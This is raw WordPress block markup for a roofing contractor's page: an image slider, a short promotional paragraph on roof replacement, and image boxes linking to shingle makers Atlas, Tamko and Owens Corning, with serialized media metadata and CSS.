style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":100,\"topPadding\":30,\"bottomPadding\":30,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"topPaddingMobile\":30,\"bottomPaddingMobile\":30,\"blockId\":\"11f54df8-ed12-474d-af0a-c624bd1b75bd\"} -->\n<style type=\"text/css\"> .block-11f54df8-ed12-474d-af0a-c624bd1b75bd .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-11f54df8-ed12-474d-af0a-c624bd1b75bd .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-11f54df8-ed12-474d-af0a-c624bd1b75bd .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-11f54df8-ed12-474d-af0a-c624bd1b75bd .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-11f54df8-ed12-474d-af0a-c624bd1b75bd .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-11f54df8-ed12-474d-af0a-c624bd1b75bd\" style=\"width:100%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":500,\"autoPlay\":true,\"autoPlaySpeed\":\"3000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#0d2e63\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"d2f65cb2-10c7-4a79-b25a-de564d91e1c1\"} -->\n<style type=\"text/css\"> .block-id-d2f65cb2-10c7-4a79-b25a-de564d91e1c1 .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-d2f65cb2-10c7-4a79-b25a-de564d91e1c1 .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-d2f65cb2-10c7-4a79-b25a-de564d91e1c1 .skt-blocks-gallery--item figure {\n height: 480px; }\n</style><div class=\"\"><div class=\"block-id-d2f65cb2-10c7-4a79-b25a-de564d91e1c1 is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:500px\" data-flickity=\"{&quot;autoPlay&quot;:3000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/slider1-1024x597.jpg\" alt=\"\" data-id=\"36\" data-link=\"https://cteisys.com/home/slider1/\" class=\"wp-image-36\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/slider2-1024x597.jpg\" alt=\"\" data-id=\"34\" data-link=\"https://cteisys.com/home/slider2/\" class=\"wp-image-34\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/18033957_1641106155903819_3439710667750671365_n.jpg\" alt=\"\" data-id=\"440\" data-link=\"https://cteisys.com/recent-works/18033957_1641106155903819_3439710667750671365_n/\" class=\"wp-image-440\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:paragraph -->\n<p>Never worry again with a new roof replacement from Dunrite. With Mike or Justin on every job you can be sure to receive quality that cannot be beat. Whether it is a residential tear off, new construction or the installation of a metal accent roof take a look at some options below.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/image-boxes-block {\"imageboxesBlock\":[{\"hover_description\":\"You’re Looking For\\u003cbr\\u003eProtection You Deserve\",\"title\":\"Atlas Shingles\",\"cta_url\":\"https://www.atlasroofing.com/roof-shingles\",\"img_id\":484,\"img_url\":{\"id\":484,\"title\":\"atlas roof shingles\",\"filename\":\"atlas-roof-shingles.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/atlas-roof-shingles.jpg\",\"link\":\"https://cteisys.com/services/roofing-2/atlas-roof-shingles/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"atlas-roof-shingles\",\"status\":\"inherit\",\"uploadedTo\":263,\"date\":\"2022-08-24T23:19:39.000Z\",\"modified\":\"2022-08-24T23:19:39.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://cteisys.com/wp-includes/images/media/default.png\",\"dateFormatted\":\"August 24, 2022\",\"nonces\":{\"update\":\"f4e29dfaf0\",\"delete\":\"cda8092ac3\",\"edit\":\"4d4ab539cc\"},\"editLink\":\"https://cteisys.com/wp-admin/post.php?post=484\\u0026action=edit\",\"meta\":false,\"authorName\":\"newd\",\"authorLink\":\"https://cteisys.com/wp-admin/profile.php\",\"uploadedToTitle\":\"Roofing\",\"uploadedToLink\":\"https://cteisys.com/wp-admin/post.php?post=263\\u0026action=edit\",\"filesizeInBytes\":\"16306\",\"filesizeHumanReadable\":\"16 KB\",\"context\":\"\",\"height\":170,\"width\":306,\"orientation\":\"landscape\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/atlas-roof-shingles-150x150.jpg\",\"orientation\":\"landscape\"},\"medium\":{\"height\":167,\"width\":300,\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/atlas-roof-shingles-300x167.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/atlas-roof-shingles.jpg\",\"height\":170,\"width\":306,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"},\"smush\":\"\\u003cp class=\\u0022smush-status\\u0022\\u003e3 images reduced by 21.1 KB (60.7%)\\u003cbr /\\u003eImage size: 15.9 KB\\u003c/p\\u003e\\u003cdiv class=\\u0022sui-smush-media smush-status-links\\u0022\\u003e\\u003ca href=\\u0022#\\u0022 class=\\u0022wp-smush-action smush-stats-details wp-smush-title sui-tooltip sui-tooltip-top-right\\u0022 data-tooltip=\\u0022Detailed stats for all the image sizes\\u0022\\u003eView Stats\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv id=\\u0022smush-stats-484\\u0022 class=\\u0022sui-smush-media smush-stats-wrapper hidden\\u0022\\u003e\\n\\t\\t\\t\\u003ctable class=\\u0022wp-smush-stats-holder\\u0022\\u003e\\n\\t\\t\\t\\t\\u003cthead\\u003e\\n\\t\\t\\t\\t\\t\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003cth class=\\u0022smush-stats-header\\u0022\\u003eImage size\\u003c/th\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003cth class=\\u0022smush-stats-header\\u0022\\u003eSavings\\u003c/th\\u003e\\n\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\n\\t\\t\\t\\t\\u003c/thead\\u003e\\n\\t\\t\\t\\t\\u003ctbody\\u003e\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\t\\u003ctd\\u003eFULL\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\t\\u003ctd class=\\u0022smush-skipped\\u0022\\u003e\\u003ca href=\\u0022https://wpmudev.com/project/wp-smush-pro/?utm_source=smush\\u0026utm_medium=plugin\\u0026utm_campaign=smush_medialibrary_savings\\u0022 target=\\u0022_blank\\u0022\\u003e\\n\\t\\t\\t\\t\\u003cspan class=\\u0022sui-tooltip sui-tooltip-left sui-tooltip-constrained sui-tooltip-top-right-mobile\\u0022 data-tooltip=\\u0022When you upload an image to WordPress it automatically creates 8 thumbnail sizes that are commonly used in your pages. WordPress also stores the original full-size image, but because these are not usually embedded on your site we don’t Smush them. Pro users can override this.\\u0022\\u003e\\n\\t\\t\\t\\t\\u003cspan class=\\u0022sui-tag sui-tag-purple sui-tag-sm\\u0022\\u003ePRO\\u003c/span\\u003e\\u003c/span\\u003e\\u003c/a\\u003e\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003eMEDIUM \\u003cbr /\\u003e (300x167)\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003e7.3 KB ( 49.5% )\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003eTHUMBNAIL \\u003cbr /\\u003e (150x150)\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003e7.0 KB ( 64.1% )\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003eFOOTERTHUMB \\u003cbr /\\u003e (100x84)\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003e6.8 KB ( 74.6% )\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\u003c/tbody\\u003e\\n\\t\\t\\t\\u003c/table\\u003e\\n\\t\\t\\u003c/div\\u003e\"}},{\"title\":\"Tamko Products\",\"cta_url\":\"https://www.tamko.com/\",\"hover_description\":\"Shingles crafted with American Pride\",\"img_id\":486,\"img_url\":{\"id\":486,\"title\":\"tamco\",\"filename\":\"tamco.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/tamco.jpg\",\"link\":\"https://cteisys.com/services/roofing-2/tamco/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"tamco\",\"status\":\"inherit\",\"uploadedTo\":263,\"date\":\"2022-08-24T23:19:57.000Z\",\"modified\":\"2022-08-24T23:19:57.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://cteisys.com/wp-includes/images/media/default.png\",\"dateFormatted\":\"August 24, 2022\",\"nonces\":{\"update\":\"6acecdcaed\",\"delete\":\"ba51f566bc\",\"edit\":\"906a5258b4\"},\"editLink\":\"https://cteisys.com/wp-admin/post.php?post=486\\u0026action=edit\",\"meta\":false,\"authorName\":\"newd\",\"authorLink\":\"https://cteisys.com/wp-admin/profile.php\",\"uploadedToTitle\":\"Roofing\",\"uploadedToLink\":\"https://cteisys.com/wp-admin/post.php?post=263\\u0026action=edit\",\"filesizeInBytes\":\"18355\",\"filesizeHumanReadable\":\"18 KB\",\"context\":\"\",\"height\":129,\"width\":291,\"orientation\":\"landscape\",\"sizes\":{\"thumbnail\":{\"height\":129,\"width\":150,\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/tamco-150x129.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/tamco.jpg\",\"height\":129,\"width\":291,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"},\"smush\":\"\\u003cp class=\\u0022smush-status\\u0022\\u003e2 images reduced by 13.9 KB (61.0%)\\u003cbr /\\u003eImage size: 17.9 KB\\u003c/p\\u003e\\u003cdiv class=\\u0022sui-smush-media smush-status-links\\u0022\\u003e\\u003ca href=\\u0022#\\u0022 class=\\u0022wp-smush-action smush-stats-details wp-smush-title sui-tooltip sui-tooltip-top-right\\u0022 data-tooltip=\\u0022Detailed stats for all the image sizes\\u0022\\u003eView Stats\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv id=\\u0022smush-stats-486\\u0022 class=\\u0022sui-smush-media smush-stats-wrapper hidden\\u0022\\u003e\\n\\t\\t\\t\\u003ctable class=\\u0022wp-smush-stats-holder\\u0022\\u003e\\n\\t\\t\\t\\t\\u003cthead\\u003e\\n\\t\\t\\t\\t\\t\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003cth class=\\u0022smush-stats-header\\u0022\\u003eImage size\\u003c/th\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003cth class=\\u0022smush-stats-header\\u0022\\u003eSavings\\u003c/th\\u003e\\n\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\n\\t\\t\\t\\t\\u003c/thead\\u003e\\n\\t\\t\\t\\t\\u003ctbody\\u003e\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\t\\u003ctd\\u003eFULL\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\t\\u003ctd class=\\u0022smush-skipped\\u0022\\u003e\\u003ca href=\\u0022https://wpmudev.com/project/wp-smush-pro/?utm_source=smush\\u0026utm_medium=plugin\\u0026utm_campaign=smush_medialibrary_savings\\u0022 target=\\u0022_blank\\u0022\\u003e\\n\\t\\t\\t\\t\\u003cspan class=\\u0022sui-tooltip sui-tooltip-left sui-tooltip-constrained sui-tooltip-top-right-mobile\\u0022 data-tooltip=\\u0022When you upload an image to WordPress it automatically creates 8 thumbnail sizes that are commonly used in your pages. WordPress also stores the original full-size image, but because these are not usually embedded on your site we don’t Smush them. Pro users can override this.\\u0022\\u003e\\n\\t\\t\\t\\t\\u003cspan class=\\u0022sui-tag sui-tag-purple sui-tag-sm\\u0022\\u003ePRO\\u003c/span\\u003e\\u003c/span\\u003e\\u003c/a\\u003e\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003eTHUMBNAIL \\u003cbr /\\u003e (150x129)\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003e7.0 KB ( 55.3% )\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003eFOOTERTHUMB \\u003cbr /\\u003e (100x84)\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003e6.9 KB ( 68.2% )\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\u003c/tbody\\u003e\\n\\t\\t\\t\\u003c/table\\u003e\\n\\t\\t\\u003c/div\\u003e\"}}],\"counterId\":\"fc4c35c5-5920-42b0-815e-00e4450fb573\"} -->\n<style type=\"text/css\"> .wp-block-skt-blocks-image-boxes-block-item.block-id-fc4c35c5-5920-42b0-815e-00e4450fb573 .wp-block-skt-blocks-image-boxes-block-item__description, .wp-block-skt-blocks-image-boxes-block-item.block-id-fc4c35c5-5920-42b0-815e-00e4450fb573 .wp-block-skt-blocks-image-boxes-block-item__title {\n color: undefined; }\n .wp-block-skt-blocks-image-boxes-block-item.block-id-fc4c35c5-5920-42b0-815e-00e4450fb573 {\n background-color: undefined; color: undefined; text-align: center; border-radius:undefinedpx; justify-content:center !important; }\n .wp-block-skt-blocks-image-boxes-block-item.block-id-fc4c35c5-5920-42b0-815e-00e4450fb573:hover .skt-blocks-add-image {\n background-image: linear-gradient(180deg,rgba(255, 255, 255, 0.7),rgba(255, 255, 255, 0.7)); border-radius:undefinedpx; }\n .wp-block-skt-blocks-image-boxes-block-item.block-id-fc4c35c5-5920-42b0-815e-00e4450fb573:hover .skt-blocks-imagebox-image-wrap.front {\n transform: scale(undefined); }\n .wp-block-skt-blocks-image-boxes-block-item.block-id-fc4c35c5-5920-42b0-815e-00e4450fb573 .skt-blocks-imagebox-image-wrap.front img {\n width:fullpx !important; max-width:100%; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.wp-block-skt-blocks-image-boxes-block-item.block-id-fc4c35c5-5920-42b0-815e-00e4450fb573 .wp-block-skt-blocks-image-boxes-block-item__title {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 976px){\n\n.wp-block-skt-blocks-image-boxes-block-item.block-id-fc4c35c5-5920-42b0-815e-00e4450fb573 .wp-block-skt-blocks-image-boxes-block-item__title {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .wp-block-skt-blocks-image-boxes-block-item.block-id-fc4c35c5-5920-42b0-815e-00e4450fb573 .wp-block-skt-blocks-image-boxes-block-item__title {\n font-size: undefinedpx; }\n}\n</style><div class=\"has-text-align-center\"><div class=\"wp-block-skt-blocks-image-boxes-block__inner has-columns has-2-columns has-responsive-columns has-medium-gutter\"><a href=\"https://www.atlasroofing.com/roof-shingles\"><div class=\"wp-block-skt-blocks-image-boxes-block-item block-id-fc4c35c5-5920-42b0-815e-00e4450fb573\" style=\"background-color:rgba(255, 255, 255, 0.7);background-image:linear-gradient(180deg,rgba(255, 255, 255, 0.7),rgba(255, 255, 255, 0.7)),url(https://cteisys.com/wp-content/uploads/2022/08/atlas-roof-shingles.jpg);padding-left:15px;padding-right:15px;padding-bottom:15px;padding-top:15px;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-add-image\"></div><h3 class=\"wp-block-skt-blocks-image-boxes-block-item__title\">Atlas Shingles</h3><p class=\"wp-block-skt-blocks-image-boxes-block-item__description\">You’re Looking For<br>Protection You Deserve</p></div></a><a href=\"https://www.tamko.com/\"><div class=\"wp-block-skt-blocks-image-boxes-block-item block-id-fc4c35c5-5920-42b0-815e-00e4450fb573\" style=\"background-color:rgba(255, 255, 255, 0.7);background-image:linear-gradient(180deg,rgba(255, 255, 255, 0.7),rgba(255, 255, 255, 0.7)),url(https://cteisys.com/wp-content/uploads/2022/08/tamco.jpg);padding-left:15px;padding-right:15px;padding-bottom:15px;padding-top:15px;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-add-image\"></div><h3 class=\"wp-block-skt-blocks-image-boxes-block-item__title\">Tamko Products</h3><p class=\"wp-block-skt-blocks-image-boxes-block-item__description\">Shingles crafted with American Pride</p></div></a></div></div>\n<!-- /wp:skt-blocks/image-boxes-block -->\n\n<!-- wp:skt-blocks/image-boxes-block {\"imageboxesBlock\":[{\"hover_description\":\"At Owens Corning, we know it’s More Than Just a Roof®.\",\"title\":\"Owens Corning\",\"cta_url\":\"https://www.owenscorning.com/\",\"img_id\":485,\"img_url\":{\"id\":485,\"title\":\"owens corning\",\"filename\":\"owens-corning.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/owens-corning.jpg\",\"link\":\"https://cteisys.com/services/roofing-2/owens-corning/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"owens-corning\",\"status\":\"inherit\",\"uploadedTo\":263,\"date\":\"2022-08-24T23:19:47.000Z\",\"modified\":\"2022-08-24T23:19:47.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://cteisys.com/wp-includes/images/media/default.png\",\"dateFormatted\":\"August 24, 2022\",\"nonces\":{\"update\":\"94850a2d2b\",\"delete\":\"df3080b8b1\",\"edit\":\"721340def0\"},\"editLink\":\"https://cteisys.com/wp-admin/post.php?post=485\\u0026action=edit\",\"meta\":false,\"authorName\":\"newd\",\"authorLink\":\"https://cteisys.com/wp-admin/profile.php\",\"uploadedToTitle\":\"Roofing\",\"uploadedToLink\":\"https://cteisys.com/wp-admin/post.php?post=263\\u0026action=edit\",\"filesizeInBytes\":\"17085\",\"filesizeHumanReadable\":\"17 KB\",\"context\":\"\",\"height\":98,\"width\":297,\"orientation\":\"landscape\",\"sizes\":{\"thumbnail\":{\"height\":98,\"width\":150,\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/owens-corning-150x98.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/owens-corning.jpg\",\"height\":98,\"width\":297,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"},\"smush\":\"\\u003cp class=\\u0022smush-status\\u0022\\u003e2 images reduced by 14.0 KB (62.1%)\\u003cbr /\\u003eImage size: 16.7 KB\\u003c/p\\u003e\\u003cdiv class=\\u0022sui-smush-media smush-status-links\\u0022\\u003e\\u003ca href=\\u0022#\\u0022 class=\\u0022wp-smush-action smush-stats-details wp-smush-title sui-tooltip sui-tooltip-top-right\\u0022 data-tooltip=\\u0022Detailed stats for all the image sizes\\u0022\\u003eView Stats\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv id=\\u0022smush-stats-485\\u0022 class=\\u0022sui-smush-media smush-stats-wrapper hidden\\u0022\\u003e\\n\\t\\t\\t\\u003ctable class=\\u0022wp-smush-stats-holder\\u0022\\u003e\\n\\t\\t\\t\\t\\u003cthead\\u003e\\n\\t\\t\\t\\t\\t\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003cth class=\\u0022smush-stats-header\\u0022\\u003eImage size\\u003c/th\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003cth class=\\u0022smush-stats-header\\u0022\\u003eSavings\\u003c/th\\u003e\\n\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\n\\t\\t\\t\\t\\u003c/thead\\u003e\\n\\t\\t\\t\\t\\u003ctbody\\u003e\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\t\\u003ctd\\u003eFULL\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\t\\u003ctd class=\\u0022smush-skipped\\u0022\\u003e\\u003ca href=\\u0022https://wpmudev.com/project/wp-smush-pro/?utm_source=smush\\u0026utm_medium=plugin\\u0026utm_campaign=smush_medialibrary_savings\\u0022 target=\\u0022_blank\\u0022\\u003e\\n\\t\\t\\t\\t\\u003cspan class=\\u0022sui-tooltip sui-tooltip-left sui-tooltip-constrained sui-tooltip-top-right-mobile\\u0022 data-tooltip=\\u0022When you upload an image to WordPress it automatically creates 8 thumbnail sizes that are commonly used in your pages. WordPress also stores the original full-size image, but because these are not usually embedded on your site we don’t Smush them. Pro users can override this.\\u0022\\u003e\\n\\t\\t\\t\\t\\u003cspan class=\\u0022sui-tag sui-tag-purple sui-tag-sm\\u0022\\u003ePRO\\u003c/span\\u003e\\u003c/span\\u003e\\u003c/a\\u003e\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003eTHUMBNAIL \\u003cbr /\\u003e (150x98)\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003e7.1 KB ( 57.1% )\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\u003ctr\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003eFOOTERTHUMB \\u003cbr /\\u003e (100x84)\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\t\\u003ctd\\u003e6.9 KB ( 68.2% )\\u003c/td\\u003e\\n\\t\\t\\t\\t\\t\\u003c/tr\\u003e\\u003c/tbody\\u003e\\n\\t\\t\\t\\u003c/table\\u003e\\n\\t\\t\\u003c/div\\u003e\"}},{\"cta_url\":\"https://dunriteroof.com/\",\"title\":\"Dunrite Roofing\",\"hover_description\":\"Quality and your satisfaction is our priority\",\"img_id\":362,\"img_url\":{\"id\":362,\"title\":\"favicon2\",\"filename\":\"favicon2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/favicon2.jpg\",\"link\":\"https://cteisys.com/favicon2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"favicon2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2022-08-22T17:14:26.000Z\",\"modified\":\"2022-08-22T17:14:26.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://cteisys.com/wp-includes/images/media/default.png\",\"dateFormatted\":\"August 22, 2022\",\"nonces\":{\"update\":\"64b740e15e\",\"delete\":\"e70c4e34ec\",\"edit\":\"b7e85ec790\"},\"editLink\":\"https://cteisys.com/wp-admin/post.php?post=362\\u0026action=edit\",\"meta\":false,\"authorName\":\"newd\",\"authorLink\":\"https://cteisys.com/wp-admin/profile.php\",\"filesizeInBytes\":8853,\"filesizeHumanReadable\":\"9 KB\",\"context\":\"\",\"height\":131,\"width\":171,\"orientation\":\"landscape\",\"sizes\":{\"thumbnail\":{\"height\":131,\"width\":150,\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/favicon2-150x131.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2022/08/favicon2.jpg\",\"height\":131,\"width\":171,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"},\"smush\":\"\\u003cp class=\\u0022smush-status\\u0022\\u003eNot processed\\u003c/p\\u003e\\u003cdiv class=\\u0022sui-smush-media smush-status-links\\u0022\\u003e\\u003ca href=\'#\' class=\'wp-smush-send\' data-id=\'362\'\\u003eSmush\\u003c/a\\u003e | \\u003ca href=\'#\' class=\'smush-ignore-image\' data-id=\'362\'\\u003eIgnore\\u003c/a\\u003e\\u003c/div\\u003e\"}}],\"counterId\":\"c77eb9f9-e476-4ddb-adc9-dfd6b65343ca\"} -->\n<style type=\"text/css\"> .wp-block-skt-blocks-image-boxes-block-item.block-id-c77eb9f9-e476-4ddb-adc9-dfd6b65343ca .wp-block-skt-blocks-image-boxes-block-item__description, .wp-block-skt-blocks-image-boxes-block-item.block-id-c77eb9f9-e476-4ddb-adc9-dfd6b65343ca .wp-block-skt-blocks-image-boxes-block-item__title {\n color: undefined; }\n .wp-block-skt-blocks-image-boxes-block-item.block-id-c77eb9f9-e476-4ddb-adc9-dfd6b65343ca {\n background-color: undefined; color: undefined; text-align: center; border-radius:undefinedpx; justify-content:center !important; }\n .wp-block-skt-blocks-image-boxes-block-item.block-id-c77eb9f9-e476-4ddb-adc9-dfd6b65343ca:hover .skt-blocks-add-image {\n background-image: linear-gradient(180deg,rgba(255, 255, 255, 0.7),rgba(255, 255, 255, 0.7)); border-radius:undefinedpx; }\n .wp-block-skt-blocks-image-boxes-block-item.block-id-c77eb9f9-e476-4ddb-adc9-dfd6b65343ca:hover .skt-blocks-imagebox-image-wrap.front {\n transform: scale(undefined); }\n .wp-block-skt-blocks-image-boxes-block-item.block-id-c77eb9f9-e476-4ddb-adc9-dfd6b65343ca .skt-blocks-imagebox-image-wrap.front img {\n width:fullpx !important; max-width:100%; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.wp-block-skt-blocks-image-boxes-block-item.block-id-c77eb9f9-e476-4ddb-adc9-dfd6b65343ca .wp-block-skt-blocks-image-boxes-block-item__title {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 976px){\n\n.wp-block-skt-blocks-image-boxes-block-item.block-id-c77eb9f9-e476-4ddb-adc9-dfd6b65343ca .wp-block-skt-blocks-image-boxes-block-item__title {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .wp-block-skt-blocks-image-boxes-block-item.block-id-c77eb9f9-e476-4ddb-adc9-dfd6b65343ca .wp-block-skt-blocks-image-boxes-block-item__title {\n font-size: undefinedpx; }\n}\n</style><div class=\"has-text-align-center\"><div class=\"wp-block-skt-blocks-image-boxes-block__inner has-columns has-2-columns has-responsive-columns has-medium-gutter\"><a href=\"https://www.owenscorning.com/\"><div class=\"wp-block-skt-blocks-image-boxes-block-item block-id-c77eb9f9-e476-4ddb-adc9-dfd6b65343ca\" style=\"background-color:rgba(255, 255, 255, 0.7);background-image:linear-gradient(180deg,rgba(255, 255, 255, 0.7),rgba(255, 255, 255, 0.7)),url(https://cteisys.com/wp-content/uploads/2022/08/owens-corning.jpg);padding-left:15px;padding-right:15px;padding-bottom:15px;padding-top:15px;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-add-image\"></div><h3 class=\"wp-block-skt-blocks-image-boxes-block-item__title\">Owens Corning</h3><p class=\"wp-block-skt-blocks-image-boxes-block-item__description\">At Owens 